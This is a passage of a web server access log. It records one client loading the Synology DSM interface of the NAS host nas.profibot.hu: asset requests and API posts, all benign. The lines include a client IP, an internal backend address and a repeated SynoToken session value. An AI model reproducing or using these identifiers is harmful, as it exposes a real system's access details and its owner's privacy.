(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/col-move-bottom.png?v=d5dbff884dc200e502ea46e943f54957" [Client 84.1.26.27] [Length 967] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/resources/images/default/s.gif" [Client 84.1.26.27] [Length 43] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/syno_echarts_patch.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/b0a46e4095ee6827c83c7dbad947529b.png" [Client 84.1.26.27] [Length 846] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 42550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource_widget.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8424] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/wdgt_icn_up_down.png?v=be8e35685f980c12e37a7edc12f2c5f7" [Client 84.1.26.27] [Length 245] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/S2S.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/config_backup.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 10113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PasswordConfirmDialog.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/TaskSchedulerUtils.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8222] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/utils.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6011] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_load.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/MyDSCenter.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1827] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_notification.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadUtil.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6974] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMUpdateNotify/DSMUpdateAction.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 562] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/core.js?v=2.7.2-2464&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1900] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/extjs/fileStationExtension.min.js?v=1.3.4-0340&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 415] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DisableAdminNotification/DisableAdminNotification.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/EjectableDeviceList.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 3055] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_util.js?v=3.2.1-23280&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 11953] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/tinymce.min.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 299542] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/PermissionDialog.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 19733] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AppNotify/AppNotify.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1295] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/DirectoryServiceVueBundle.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-filter.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Chooser/Chooser.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 3238] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_component.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 3604] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PercentageBar.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 824] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/FileChooser.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 12453] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/lazyDataView.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2838] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/LoginStyleVueBundle.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 20123] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotifyVueBundle.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileSharing/FileSharing.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemStatusChecker/SystemStatusChecker.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/FileTaskUtil.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 640] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/DiskMessageApp.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1352] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/PollingTask.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PortEnable/PortEnable.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2571] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowserUtil.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 16195] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/ActiveInsightUpdateNotify.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/EnableNewUpdateSetting.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2986] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/NotificationVueBundle.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 14148] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_fbext.js?v=3.2.1-23280&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1817] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.DisableAdmin" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 17628] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 51689] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 186] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3567] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCEVue.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 5714] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/CustomColumn.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/smb-tab.js?v=4.15.9-0644&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 14997] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/directory-admin-list-dialog.js?v=4.15.9-0644&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 3025] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_wizard.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 41851] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskGrid.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1711] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/TaskGrid.js?v=1.3.4-1404&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1458] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/dscs_package.js?v=2.7.2-2464&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 69138] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 526] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotify.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 5758] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/svg/checkbox.svg" [Client 84.1.26.27] [Length 4052] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_selector.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Upgrade" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/desktop_index_tray.js?v=3.2.1-23280&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/core.js?v=3.2.1-23280&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6932] [Gzip -] [Sent-to 